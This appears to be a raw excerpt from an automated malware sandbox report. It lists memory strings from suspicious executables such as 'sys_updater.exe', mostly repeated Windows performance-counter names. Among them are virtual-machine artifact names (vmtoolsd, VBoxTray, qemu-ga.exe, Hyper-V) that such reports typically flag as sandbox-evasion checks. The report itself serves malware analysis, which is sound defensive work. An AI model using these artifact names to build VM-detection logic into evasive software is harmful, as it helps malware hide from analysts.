                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2140247893.00000234D412E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2140442384.00000234D412E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2141646322.00000234D412D000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2140855705.00000234D412E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2140360662.00000234D412E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2152444106.00000234D410F000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2141190168.00000234D412E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot
                            Source: sys_updater.exe, 00000018.00000003.2641927809.0000021E03058000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accu
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor\6
                            Source: sys_updater.exe, 0000001F.00000003.2838586237.0000020E47B69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860I
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipesl
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes0~
                            Source: sys_updater.exe, 0000001B.00000003.2712171973.00000159F3459000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r: RA-Secondary 3258In - Teredo Server Total Packets: Success + Error / sec3206Teredo Client3208In - Teredo Router Advertisement3210In - Teredo Bubble3212In - Teredo Data3214In - Teredo Invalid3216Out - Teredo Router Solicitation3218Out - Teredo Bubble3220Out - Teredo Data3222In - Teredo Data User Mode3224In - Teredo Data Kernel Mode3226Out - Teredo Data User Mode3228Out - Teredo Data Kernel Mode6468Hyper-V Dynamic Memory Integration Service6470Maximum Memory, Mbytes1848Bluetooth Radio1850Classic ACL bytes written/sec1852LE ACL bytes written/sec1854SCO bytes written/sec1856Classic ACL bytes read/sec1858LE ACL bytes read/sec1860SCO bytes read/sec1862Classic ACL Connections1864LE ACL Connections1866SCO Connections1868Sideband SCO Connections1870ACL flush events/sec1872LE ACL write credits1874Classic ACL write credits1876LE Scan Duty Cycle (%) - Uncoded 1M Phy1878LE Scan Window - Uncoded 1M Phy1880LE Scan Interval - Uncoded 1M Phy1882Page Scan Duty Cycle (%)1884Page Scan Window1886Page Scan Interval1888Inquiry Scan Duty Cycle (%)1890Inquiry Scan Window1892Inquiry Scan Interval1894LE Scan Duty Cycle (%) - Coded Phy1896LE Scan Window - Coded Phy1898LE Scan Interval - Coded Phy1900Bluetooth Device1902Classic ACL bytes written/sec1904LE ACL bytes written/sec1906SCO bytes written/sec1908Classic ACL bytes read/sec1910LE ACL bytes read/sec1912SCO bytes read/sec3814ServiceModelService 4.0.0.03816Calls&
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processorn}
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor8B
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processordll
                            Source: sys_updater.exe, 0000001B.00000003.2716964943.00000159F1B0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root PartitionByO
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2139747550.00000234D400A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages49305
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AA2000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1A9B000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor1/X
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration ServicellJ
                            Source: explert.exe, 00000003.00000002.1679510345.000000000102E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd.dllPro
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AA2000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1A9B000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service%/X
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000000.1784775730.00007FF7B6561000.00000020.00000001.01000000.00000009.sdmp, sys_updater.exe, 00000018.00000000.2275651489.00007FF6712E1000.00000020.00000001.01000000.00000018.sdmp, sys_updater.exe, 0000001B.00000000.2357220632.00007FF6712E1000.00000020.00000001.01000000.00000018.sdmp, sys_updater.exe, 0000001F.00000000.2438513793.00007FF6712E1000.00000020.00000001.01000000.00000018.sdmp, sys_updater.exe, 00000022.00000000.2519363810.00007FF6712E1000.00000020.00000001.01000000.00000018.sdmpBinary or memory string: VBoxTrayM1
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2139747550.00000234D400A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Tim
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition8
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshotfo
                            Source: sys_updater.exe, 0000001F.00000003.2801933921.0000020E47B83000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2808984641.0000020E47B7F000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2808766531.0000020E47B7C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2801620413.0000020E47B83000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2801333286.0000020E47B83000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2802821804.0000020E47B83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation
                            Source: sys_updater.exe, 00000022.00000000.2519363810.00007FF6712E1000.00000020.00000001.01000000.00000018.sdmpBinary or memory string: vmtoolsdM1
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor1B
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5AAE000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BC3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172784971.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5ABF000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5C04000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5B00000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5BB1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2686476457.0000021E03768000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2670749256.0000021E03431000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus Pipes
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V qbqdsitfxsrfbfn Bus$
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partitiont
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor3@
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe@\fq
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisori
                            Source: sys_updater.exe, 00000018.00000003.2637181998.0000021E0170C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2634033252.0000021E0170C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisorr:
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2153847407.00000234D4105000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisorr=
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172784971.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2656389564.0000021E0315F000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2673976502.0000021E031AC000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2754063369.00000159F345A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWuv
                            Source: sys_updater.exe, 00000022.00000003.2889560292.00000237D3212000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2892935939.00000237D3201000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2878565420.00000237D3201000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AA2000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1A9B000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processori/X
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partitionows\+
                            Source: sys_updater.exe, 00000018.00000003.2631778406.0000021E02FCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor 